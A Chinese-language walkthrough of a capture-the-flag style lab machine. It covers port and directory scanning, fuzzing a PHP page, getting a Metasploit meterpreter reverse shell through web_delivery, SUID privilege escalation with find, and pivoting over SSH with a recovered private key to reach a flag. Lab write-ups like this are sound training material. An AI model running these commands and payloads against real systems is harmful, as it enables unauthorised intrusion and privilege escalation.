靶机信息:
kali:192.168.21.129
靶机:192.168.21.151
信息收集
端口扫描:开放了22,80,2222,8022端口
nmap -A -p- 192.168.21.151
访问一下web端 Apache默认界面,没有什么信息
扫描一下目录,info.php文件
dirb http://192.168.21.151
看一下info.php页面,发现了这个
其余的好像没有什么特别重要的信息
再看看index.php页面
里面可能有还有其他路径,对这个页面模糊测试一下
wfuzz -c -w /usr/share/dirb/wordlists/common.txt -u http://192.168.21.151/index.php
z
找到了 加到路径后面去看能不能查看些其他东西
发现他好像只能查看有没有这个东西,不能查看文件里面的内容
测试一下看能不能执行一些命令还是其他的
接着上msf
use exploit/multi/script/web_delivery #使用这个攻击模块
set payload php/meterpreter/reverse_tcp #设置payload
set target php #设置目标
show options #查看选项
运行
把生成payload放到页面执行
msf就会产生一个会话
利用Python重新开启一个终端
python3 -c 'import pty;pty.spawn("/bin/bash")'
进入到home目录下看下,有个mike目录,进去看下有什么东西
ls -al 查看所有文件以及所有的详细信息
这里发现最后文件具有可执行权限,试着执行一下看是什么东西
执行,这是个啥
因为现在为www-data用户,权限非常低,利用一下find提权吧,可以暂时提权root权限
不懂的话可以看看其他文章
find / -perm -4000 2>/dev/null
注意这个
进入到这个目录然后执行相应的文件,这个时候发现我们已经是root权限了,但是我们发现好像Id依然显示的是www-data用户
总感觉没有哪里怪怪的,好像没有跳出容器,继续吧,看一下网络接口
想办法整个nmap过来,扫描一下接口还有没有其他主机;扫描之后发现还有个主机172.16.20.6
且该主机的22端口开放
别忘了我们刚才在用户目录下发现了.ssh的备份文件
看下里面有什么
ssh mike@172.16.20.6 -i id_rsa #-i 指定连接文件
查看开放的端口,3306 MySQL端口,里面肯定有东西,连接
ss -tlnu
退出,切换root用户
进入到root目录下发现有个压缩文件
利用unzip解压,需要密码。密码已经在数据库里头了,解压完成后发现flag在里头